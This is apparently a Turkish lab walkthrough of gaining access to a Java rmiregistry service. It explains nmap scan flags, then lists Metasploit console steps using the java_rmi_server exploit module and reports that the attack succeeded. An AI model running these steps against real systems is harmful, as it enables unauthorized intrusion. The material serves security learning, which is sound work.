rmiregistry Nedir?
java servisidir.
sızma: exploiti bulunmaktadır.
modül: exploit/multi/misc/java_rmi_server
Adım 1: Aktif Bilgi Toplama
"nmap" yazılımının "-sS,-sV,-O,-p-,--open" parametreleriyle hedefe sistemde port taraması yapıyorum.
-sS : SYN bağlantısıyla tarama yapacağı anlamına gelir.
-sV : versiyon bilgisini vereceği anlamına gelir.
-O : işletim sistemini bulacağı anlamına gelir.
-p- : tüm portların taranacağı anlamına gelir.
--open : sadece açık portların gösterileceği anlamına gelir.
Adım 2: Erişim Elde Etme
metasploit’in hatasız çalışması için postgresql servisini başlatıyorum.
"msfconsole -q" : metasploit’i banner’sız çalıştırıyorum.
"search rmiregistry" : rmiregistry ile alakalı arama yapıyorum.
"use" : exploit işlemini gerçekleştirecek modülü açıyorum.
"show options" : modülün ayarlarını görüyorum.
"set RHOSTS" : hedef sistemin ip adresini veriyorum.
"set RPORT": ellemiyorum çünkü default olarak gelen port hedef sistemde rmiregistry servislerinden birinin kullandığı port.
"exploit" : exploit işlemini başlatıyorum.
ve puf ! başarılı
